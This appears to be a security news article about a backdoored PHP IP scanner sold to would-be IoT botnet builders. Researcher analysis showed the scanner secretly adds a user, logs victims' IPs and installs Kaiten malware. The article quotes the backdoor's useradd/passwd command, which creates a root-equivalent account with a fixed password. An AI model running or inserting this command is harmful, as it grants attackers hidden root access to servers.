Website offering the backdoored script

Wannabe hackers looking to create their very own Reaper botnet might have gotten more than they asked when they downloaded an IP scanner over the past few weeks.

The IP scanner is a PHP file that was made available as a free download a few weeks back after news broke about Reaper, a botnet made up of vulnerable routers and IoT devices.

Reaper was different because its creators used an IP scanner to find vulnerable systems and then they used exploits for various vulnerabilities to install the Reaper malware on vulnerable devices. This was different from recent IoT botnets like Mirai and Hajime, who used Telnet and SSH brute-force dictionary attacks to break into unsecured devices.

Hacker rides the Reaper hype train

One clever crook was quick to realize that with the rise of this new botnet, wannabe hackers and script kiddies would soon be looking for tools to build similar botnets.

As such, this crook — whose name we're not going to use in this article — created a website where he was advertising a PHP script that would read IPs from a local text file named poop.txt, check if the IP was hosting a GoAhead web server, and list positive results in a file named GoAhead-Filtered.txt.

Backdoored IP scanner script

Wannabe hackers were interested in this script because it allowed them to identify devices with GoAhead servers, usually IP security cameras, for which public exploits exist and which were also targeted by the Reaper botnet.

Script kiddies with little technical knowledge and who didn't pay attention to the PHP script's source code probably didn't find it strange that most of the PHP script was obfuscated behind a wall of random characters.

"In this case, the script was ciphered multiple times by using ROT13, base64, and the data was also gzipped," says Ankit Anubhav, Principal Researcher at NewSky Security, the one who discovered the ruse.

IP scanner script was backdoored to allow remote access

After decompiling the code, Anubhav says the script contained a pretty obvious backdoor, something that any experienced coder would have anticipated seeing the large blob of obfuscated source code.

This blob of code contained four parts. The first was a fully functional IP scanner, as promised. The second part ran Bash commands that added a new user on the (Linux) server where the victim would execute the IP scanner script. The third part logged the victim's IP address on a remote server. The fourth part would download and execute the Kaiten botnet malware on the server where the IP scanner was being executed.

Structure of backdoored script

Basically, users looking into creating their own Reaper-like botnet would end up being part of someone else's Kaiten botnet.

Furthermore, the crook who offered this script would have also been able to log into infected servers thanks to the logged IP and the backdoor account (user VM, password Meme123).

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash VM; echo -e "Meme123\nMeme123" | passwd VM;

Speaking to Bleeping Computer, Anubhav also pointed out that the crook could use this backdoor to collect the GoAhead-Filtered.txt files containing the results of everyone else's scans and use these IPs to hijack GoAhead cameras after letting other botnet hunters do all the work for him.

Crook caught by others, called out on Twitter

This whole scheme wasn't particularly complex, and Anubhav wasn't the only one who discovered the backdoor. Other hackers found it too and called out the author on Twitter.

Hacker called out on Twitter

Digging deeper into some of the IDs used by the backdoor creator, we also discovered that this wasn't the first time when he published backdoored malware or had online fights with other hackers. This may explain why Anubhav found a dox file in the hacker's name.

Hacker dox document

At the time of writing, the site peddling the backdoored PHP script was taken down, but Anubhav told Bleeping Computer the hacker continues to sell other scripts on underground hacking forums, where he also provides support to people who want to set up an IoT botnet.

This is also not the first backdoor malware that's been made available on the hacker underground scene. Back in September, Zscaler found a backdoor hidden in the Cobian RAT malware, sold at the time on various underground hacking forums.

If you're looking for more details on the backdoored script, Anubhav has published a technical analysis on the NewSky Security blog, here.